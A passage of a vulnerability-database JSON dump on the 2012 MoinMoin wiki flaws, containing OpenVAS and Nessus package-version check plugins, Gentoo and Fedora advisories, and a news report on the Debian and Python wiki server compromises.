value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 09:24:43 +0530 (Thu, 24 Jan 2013)\");\n script_cve_id(\"CVE-2012-6495\", \"CVE-2012-4404\", \"CVE-2012-6081\",\n \"CVE-2012-6082\", \"CVE-2012-6080\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2013-0685\");\n script_name(\"Fedora Update for moin FEDORA-2013-0685\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of moin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.9.6~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-4404", "CVE-2012-6080", "CVE-2012-6081"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:1361412562310865221", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865221", "type": "openvas", "title": "Fedora Update for moin FEDORA-2013-0640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2013-0640\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097263.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865221\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 09:23:38 +0530 (Thu, 24 Jan 2013)\");\n script_cve_id(\"CVE-2012-6495\", \"CVE-2012-4404\", \"CVE-2012-6081\",\n \"CVE-2012-6082\", \"CVE-2012-6080\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-0640\");\n script_name(\"Fedora Update for moin FEDORA-2013-0640\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"moin on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.9.6~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-4404", "CVE-2012-6080", "CVE-2012-6081"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-01-24T00:00:00", "id": "OPENVAS:1361412562310865229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865229", "type": "openvas", "title": "Fedora Update for moin FEDORA-2013-0685", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for moin FEDORA-2013-0685\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097329.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865229\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-24 09:24:43 +0530 (Thu, 24 Jan 2013)\");\n script_cve_id(\"CVE-2012-6495\", \"CVE-2012-4404\", \"CVE-2012-6081\",\n \"CVE-2012-6082\", \"CVE-2012-6080\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2013-0685\");\n script_name(\"Fedora Update for moin FEDORA-2013-0685\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'moin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"moin on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"moin\", rpm:\"moin~1.9.6~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "edition": 1, "description": "### Background\n\nMoinMoin is a Python WikiEngine.\n\n### Description\n\nMultiple vulnerabilities have been discovered in MoinMoin. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code with the privileges of the process, overwrite arbitrary files, or conduct Cross-Site Scripting (XSS) attacks. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll MoinMoin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/moinmoin-1.9.6\"", "modified": "2013-09-24T00:00:00", "published": "2013-09-24T00:00:00", "id": "GLSA-201309-14", "href": "https://security.gentoo.org/glsa/201309-14", "type": "gentoo", "title": "MoinMoin: Multiple vulnerabilities", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2017-01-08T18:01:26", "bulletinFamily": "info", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "description": "[](<http://1.bp.blogspot.com/-T2x80zC8BoI/UO2QrLzKPoI/AAAAAAAARog/ug8nXOzsr0w/s1600/Official+Debian+and+Python+Wiki+Servers+Compromised.png>)\n\nAdministration from Debian and Python project official websites confirmed that their WIKI servers were compromised by some unknown hackers recently. Hackers was able to hack because of several vulnerabilities in \"**_moin_**\" package.\n\n \n\n\nAccording to [Brian Curtin at Python Project](<https://mail.python.org/pipermail/python-dev/2013-January/123499.html>), Hacker user some unknown remote code exploit on Python Wiki server (http://wiki.python.org/) and was able to get shell access. The shell was restricted to \"moin\" user permissions, where but no other services were affected. Attacker deleted all files owned by the \"moin\" user, including all instance data for both the Python and Jython wikis.\n\n \n\n\nPython Software Foundation encourages all wiki users to change their password on other sites if the same one is in use elsewhere. For now, Python Wiki is down and team is investigating more about breach.\n\n \n\n\nWhere as in Debian Wiki (http://wiki.debian.org/) security breach, user use some known vulnerabilities Directory traversal ([CVE-2012-6080](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6080>), [CVE-2012-6495](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6495>)), Multiple unrestricted file upload vulnerabilities ([CVE-2012-6081](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6081>)), Cross-site scripting (XSS) vulnerability ([CVE-2012-6082](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6082>)).\n\n \n\n\nLuca from Debian also [mention](<http://lwn.net/Articles/531726/>),\"_We have reset all password hashes and sent individual notification to all Debian wiki account holders with instructions on how to recover their passwords_\".\n\n \n\n\nIn case of Debian, hacker compromise only 'wiki' user and have captured the email addresses and corresponding password hashes of all wiki editors. \"_The attacker(s) were particularly interested in the password hashes belonging to users of Debian, Intel, Dell, Google, Microsoft, GNU, any .gov and any .edu._\"\n\n \n\n\nBoth servers was compromised in December 2012, but it is not clear yet that same hacker do both hacks or not.\n", "modified": "2013-01-11T18:02:27", "published": "2013-01-09T04:49:00", "id": "THN:513C185A1CC3F29D2D37E30BC34E5D30", "href": "http://thehackernews.com/2013/01/official-debian-and-python-wiki-servers.html", "type": "thn", "title": "Official Debian and Python Wiki Servers Compromised", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6080", "CVE-2012-6081", "CVE-2012-6082", "CVE-2012-6495"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2013-01-20T02:56:24", "published": "2013-01-20T02:56:24", "id": "FEDORA:5D361217B3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: moin-1.9.6-1.fc18", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4404", "CVE-2012-6080", "CVE-2012-6081", "CVE-2012-6082", "CVE-2012-6495"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2013-01-23T01:38:58", "published": "2013-01-23T01:38:58", "id": "FEDORA:3EF79212B5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: moin-1.9.6-1.fc16", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4404", "CVE-2012-6080", "CVE-2012-6081", "CVE-2012-6082", "CVE-2012-6495"], "description": "MoinMoin is an advanced, easy to use and extensible WikiEngine with a large community of users. Said in a few words, it is about collaboration on easily editable web pages. ", "modified": "2013-01-23T02:00:37", "published": "2013-01-23T02:00:37", "id": "FEDORA:7158B21799", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: moin-1.9.6-1.fc17", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T10:54:48", "description": "The remote host is affected by the vulnerability described in GLSA-201309-14\n(MoinMoin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MoinMoin. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process, overwrite arbitrary files, or conduct\n Cross-Site Scripting (XSS) attacks.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2013-09-25T00:00:00", "title": "GLSA-201309-14 : MoinMoin: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-09-25T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:moinmoin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201309-14.NASL", "href": "https://www.tenable.com/plugins/nessus/70110", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201309-14.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70110);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\", \"CVE-2012-6495\");\n script_bugtraq_id(57076, 57082, 57089, 57147);\n script_xref(name:\"GLSA\", value:\"201309-14\");\n\n script_name(english:\"GLSA-201309-14 : MoinMoin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201309-14\n(MoinMoin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in MoinMoin. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary code with the\n privileges of the process, overwrite arbitrary files, or conduct\n Cross-Site Scripting (XSS) attacks.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201309-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All MoinMoin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/moinmoin-1.9.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:moinmoin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/moinmoin\", unaffected:make_list(\"ge 1.9.6\"), vulnerable:make_list(\"lt 1.9.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MoinMoin\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T09:47:45", "description": "It was discovered that missing input validation in the twikidraw and\nanywikidraw actions can result in the execution of arbitrary code.\nThis security issue is being actively exploited.\n\nThis update also addresses path traversal in AttachFile.", "edition": 19, "published": "2012-12-31T00:00:00", "title": "Debian DSA-2593-1 : moin - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2012-12-31T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:moin"], "id": "DEBIAN_DSA-2593.NASL", "href": "https://www.tenable.com/plugins/nessus/63356", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2593. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63356);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\", \"CVE-2012-6495\");\n script_bugtraq_id(57076);\n script_xref(name:\"DSA\", value:\"2593\");\n\n script_name(english:\"Debian DSA-2593-1 : moin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that missing input validation in the twikidraw and\nanywikidraw actions can result in the execution of arbitrary code.\nThis security issue is being actively exploited.\n\nThis update also addresses path traversal in AttachFile.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/moin\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2593\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the moin packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.9.3-1+squeeze4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:moin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/12/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"python-moinmoin\", reference:\"1.9.3-1+squeeze4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:48", "description": "Update to 1.9.6. Fixes CVE-2012-6495\n\nFor full changes, see :\n\nhttp://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "published": "2013-01-21T00:00:00", "title": "Fedora 18 : moin-1.9.6-1.fc18 (2013-0600)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-6082", "CVE-2012-6495", "CVE-2012-6080", "CVE-2012-6081"], "modified": "2013-01-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:moin"], "id": "FEDORA_2013-0600.NASL", "href": "https://www.tenable.com/plugins/nessus/63636", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0600.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63636);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-6080\", \"CVE-2012-6081\", \"CVE-2012-6082\");\n script_bugtraq_id(57076, 57082, 57089);\n script_xref(name:\"FEDORA\", value:\"2013-0600\");\n\n script_name(english:\"Fedora 18 : moin-1.9.6-1.fc18 (2013-0600)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.9.6. Fixes CVE-2012-6495\n\nFor full changes, see :\n\nhttp://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://hg.moinmo.in/moin/1.9/raw-file/1.9.6/docs/CHANGES\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890902\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=890904\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097105.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?87dc6bf3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected moin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"MoinMoin 1.9.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MoinMoin twikidraw Action Traversal File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") 